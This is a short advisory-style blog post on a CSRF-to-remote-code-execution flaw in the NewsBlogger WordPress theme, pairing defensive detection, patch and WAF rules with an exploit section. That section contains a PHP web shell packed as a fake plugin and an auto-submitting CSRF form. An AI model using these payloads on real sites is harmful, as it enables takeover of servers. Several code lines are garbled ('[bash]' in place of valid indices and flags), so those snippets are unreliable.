WordPress NewsBlogger Theme CSRF to RCE (CVE-2025-1305) – Critical

By /

The NewsBlogger WordPress theme (≤v0.2.5.4) fails to implement nonce validation in its `newsblogger_install_and_activate_plugin()` function, enabling CSRF attacks. Attackers craft malicious requests that, when executed by an admin, force the theme to process unauthorized plugin uploads. The function accepts arbitrary ZIP files without proper verification, allowing attackers to deploy backdoors. Since WordPress executes plugin PHP code automatically after activation, this leads to remote code execution. The attack requires social engineering to trick an admin into clicking a link while authenticated.

DailyCVE Form:

Platform: WordPress
Version: ≤0.2.5.4
Vulnerability: CSRF→RCE
Severity: Critical
Date: 2025-05-01

What Undercode Say:

Exploit:

1. Craft a malicious plugin ZIP:

echo "<?php system(\$_GET['cmd']); ?>" > payload.php
zip evil-plugin.zip payload.php

2. Host CSRF payload:


<form action="http://target/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="newsblogger_install_and_activate_plugin">
<input type="file" name="plugin_zip" id="evil">
<script>document.forms[bash].submit();</script>
</form>

Detection:

Check theme version:

SELECT option_value FROM wp_options WHERE option_name = 'stylesheet';

Mitigation:

1. Patch code with nonce check:

function newsblogger_install_and_activate_plugin() {
if (!wp_verify_nonce($_REQUEST['_wpnonce'], 'newsblogger_actions')) {
wp_die('Security check failed');
}
// Original logic
}

2. Apache .htaccess rule to block direct function access:

<Files "admin-ajax.php">
RewriteCond %{QUERY_STRING} action=newsblogger_install_and_activate_plugin
RewriteRule ^ - [bash]
</Files>

Post-Exploit Analysis:

Find implanted plugins:

find /var/www/html/wp-content/plugins -name ".php" -mtime -1

WAF Rule (ModSecurity):

SecRule ARGS:action "@streq newsblogger_install_and_activate_plugin" "id:1005,deny,msg:'NewsBlogger Exploit Attempt'"

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top